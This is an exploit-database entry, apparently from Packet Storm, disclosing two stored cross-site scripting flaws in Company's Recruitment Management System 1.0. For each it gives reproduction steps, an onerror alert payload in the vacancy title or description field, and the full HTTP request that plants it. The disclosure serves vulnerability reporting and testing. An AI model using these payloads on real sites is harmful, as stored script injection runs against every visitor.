Exploit for Company's Recruitment Management System 1.0 Cross Site Scripting

Name: Exploit for Company's Recruitment Management System 1.0 Cross Site Scripting
Rating: 5 (220 reviews)
2021-10-18 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:164526
# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)  
# Date: 17-10-2021  
# Exploit Author: Aniket Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10,XAMPP  
  
Steps to Reproduce:  
1)Navigate to http://127.0.0.1/employment_application & Login with staff account .  
2) Navigate to vacancies tab  
3) Click on Add new .  
4)Add Payload  
"><img src=x onerror=alert(1)>  
  
in Vacancy Title field.  
  
5)Click on Save and you are done. It's gonna be triggered when anyone  
visits the application.  
  
Request:-  
  
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------15502044322641666722659366422  
Content-Length: 931  
Origin: http://127.0.0.1  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Cache-Control: no-transform  
  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="id"  
  
  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="title"  
  
"><img src=x onerror=alert(1)>  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="designation_id"  
  
1  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="slots"  
  
1  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="description"  
  
  
-----------------------------15502044322641666722659366422  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------15502044322641666722659366422--  
  
  
  
---------------------  
  
# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)  
# Date: 18-10-2021  
# Exploit Author: Aniket Anil Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10,XAMPP  
  
Step to reproduce:-  
1)Login with staff account & Navigate to Vacancies tab.  
  
2)Click on add new vacancies .Put any random information on other field except description & go to the description window .  
  
3)In the description field select insert link .  
  
5) In Text to display the field add the following payload .  
  
"><img src=x onerror=alert(1)>  
  
*6)Click on save & you are done.It's gonna be triggered when some one open  
vacancies details *  
  
Request:-  
  
POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)  
Gecko/20100101 Firefox/93.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------156186133432167175201476666002  
Content-Length: 1012  
Origin: http://127.0.0.1  
DNT: 1  
Connection: close  
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies  
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="id"  
  
  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="title"  
  
Test1ee  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="designation_id"  
  
4  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="slots"  
  
1  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="status"  
  
1  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="description"  
  
<p><br><a href="http://google.com" target="_blank">"><img src="x"  
onerror="alert(1)"></a></p>  
-----------------------------156186133432167175201476666002  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------156186133432167175201476666002--